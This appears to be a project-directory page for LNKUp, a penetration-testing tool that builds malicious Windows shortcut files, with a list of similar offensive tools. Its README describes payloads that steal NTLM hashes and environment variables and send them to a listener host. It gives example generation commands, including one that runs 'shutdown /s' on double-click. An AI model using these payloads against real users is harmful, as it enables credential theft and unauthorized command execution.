Plazmaz / Lnkup
Generates malicious LNK file payloads for data exfiltration
Stars: ✭ 205
Programming Languages
python
139335 projects - #7 most used programming language
Projects that are alternatives of or similar to Lnkup
Brutal
Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy . Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device ( Payload Teensy )
Stars: ✭ 678 (+230.73%)
Mutual labels: usb, penetration-testing, payload
Lscript
The LAZY script will make your life easier, and of course faster.
Stars: ✭ 3,056 (+1390.73%)
Mutual labels: pentesting, penetration-testing, payload
Oscp Pentest Methodologies
备考 OSCP 的各种干货资料/渗透测试干货资料
Stars: ✭ 166 (-19.02%)
Mutual labels: pentesting, penetration-testing
Zap Cli
A simple tool for interacting with OWASP ZAP from the commandline.
Stars: ✭ 166 (-19.02%)
Mutual labels: pentesting, penetration-testing
Wstg
The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services.
Stars: ✭ 3,873 (+1789.27%)
Mutual labels: pentesting, penetration-testing
Silentbridge
Silentbridge is a toolkit for bypassing 802.1x-2010 and 802.1x-2004.
Stars: ✭ 136 (-33.66%)
Mutual labels: pentesting, penetration-testing
Quiver
Quiver is the tool to manage all of your tools for bug bounty hunting and penetration testing.
Stars: ✭ 140 (-31.71%)
Mutual labels: pentesting, penetration-testing
Docker Security Images
🔐 Docker Container for Penetration Testing & Security
Stars: ✭ 172 (-16.1%)
Mutual labels: pentesting, penetration-testing
Jwtxploiter
A tool to test security of json web token
Stars: ✭ 130 (-36.59%)
Mutual labels: pentesting, penetration-testing
Awesome Shodan Queries
🔍 A collection of interesting, funny, and depressing search queries to plug into shodan.io 👩💻
Stars: ✭ 2,758 (+1245.37%)
Mutual labels: pentesting, penetration-testing
Crithit
Takes a single wordlist item and tests it one by one over a large collection of websites before moving onto the next. Create signatures to cross-check vulnerabilities over multiple hosts.
Stars: ✭ 182 (-11.22%)
Mutual labels: pentesting, penetration-testing
Knary
A simple HTTP(S) and DNS Canary bot with Slack/Discord/MS Teams & Pushover support
Stars: ✭ 187 (-8.78%)
Mutual labels: pentesting, penetration-testing
Xssmap
XSSMap 是一款基于 Python3 开发用于检测 XSS 漏洞的工具
Stars: ✭ 134 (-34.63%)
Mutual labels: pentesting, penetration-testing
Trigmap
A wrapper for Nmap to quickly run network scans
Stars: ✭ 132 (-35.61%)
Mutual labels: pentesting, penetration-testing
Fdsploit
File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.
Stars: ✭ 199 (-2.93%)
Mutual labels: pentesting, penetration-testing
Learn Web Hacking
Study Notes For Web Hacking / Web安全学习笔记
Stars: ✭ 2,326 (+1034.63%)
Mutual labels: pentesting, penetration-testing
Attiny85
RubberDucky like payloads for DigiSpark Attiny85
Stars: ✭ 169 (-17.56%)
Mutual labels: pentesting, payload
Hrshell
HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.
Stars: ✭ 193 (-5.85%)
Mutual labels: pentesting, penetration-testing
Ratel
RAT-el is an open source penetration test tool that allows you to take control of a windows machine. It works on the client-server model, the server sends commands and the client executes the commands and sends the result back to the server. The client is completely undetectable by anti-virus software.
Stars: ✭ 121 (-40.98%)
Mutual labels: pentesting, payload
Pidrila
Python Interactive Deepweb-oriented Rapid Intelligent Link Analyzer
Stars: ✭ 125 (-39.02%)
Mutual labels: pentesting, penetration-testing
LNKUp
LNK Data exfiltration payload generator
This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.
Info
I am not responsible for any actions you take with this tool!
You can contact me with any questions by opening an issue, or via my Twitter, @Plazmaz.
Known gotchas
- This tool will not work on OSX or Linux machines. It is specifically designed to target windows.
- There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it.
- You will need to run a responder or metasploit module server to capture NTLM hashes.
- To capture environment variables, you'll need to run a webserver like apache, nginx, or even just this
Installation
Install requirements using
pip install -r requirements.txt
Usage
Payload types:
- NTLM
- Steals the user's NTLM hash when rendered.
- Needs listener server such as this metasploit module
- More on NTLM hashes leaking: https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/
- Example usage:
lnkup.py --host localhost --type ntlm --output out.lnk
- Environment
- Steals the user's environment variables.
- Examples: %PATH%, %USERNAME%, etc
- Requires variables to be set using --vars
- Example usage:
lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk
Extra:
- Use
--executeto specify a command to run when the shortcut is double clicked- Example:
lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"
- Example:
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].